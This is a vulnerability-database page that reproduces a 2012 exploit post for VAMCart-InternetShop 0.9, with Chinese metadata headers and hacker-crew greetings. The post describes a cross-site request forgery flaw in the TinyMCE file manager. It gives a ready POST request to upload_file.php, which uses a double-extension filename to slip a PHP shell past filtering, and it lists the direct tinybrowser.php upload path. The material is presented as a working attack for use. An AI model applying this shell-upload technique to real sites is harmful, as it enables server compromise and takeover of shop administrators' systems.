VAMCart-InternetShop 0.9 Cross Site Request Forgery / Shell Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047406 漏洞类型
发布时间 2012-05-30 更新时间 2012-05-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012050205
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###
# Title : VAMCart-InternetShop v0.9 (XSRF/FileUpload) Vulnerabilities 
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com
# platform : php
# Type : Multiple
# Security Risk : Critical
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE  ***** |
# | ------------------------------------------------- < |
##

# <3 <3 Greetings t0 Palestine <3 <3

# Download : [http://vamcart.googlecode.com/files/vamcart.zip]

--> Description :
This exploits/p0c a cross-site request forgery (CSRF/XSRF) Vulnerability in 
Tiny_Mce File's Manager in VMCart InternetShop CMS v0.9, allow remote attackers to 
hijack the authentication of administrators for requests that upload a file via TinyMCE

--> DATA 4 Send/Upload 'a File/Shell :

POST http://192.168.1.2/vmc/upload_file.php?folder=/files/&type=file

User-Agent: [ Your User Agent ]
Connection: keep-alive
Content-Type: application/octet-stream
Content-Disposition: form-data; name=\"Filedata\"; filename=\"Inj3ct0rK3d.ph.p"
Content-Length: [ u r Shell/File Length ]

       --> And Post/Submit DATA <--

--> Or Use The Browser :

http://192.168.1.2/vmc/js/tiny_mce/plugins/tinybrowser/tinybrowser.php
http://[Target-Host]/[path]/js/tiny_mce/plugins/tinybrowser/tinybrowser.php

### << ThE|End

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs ..
#=============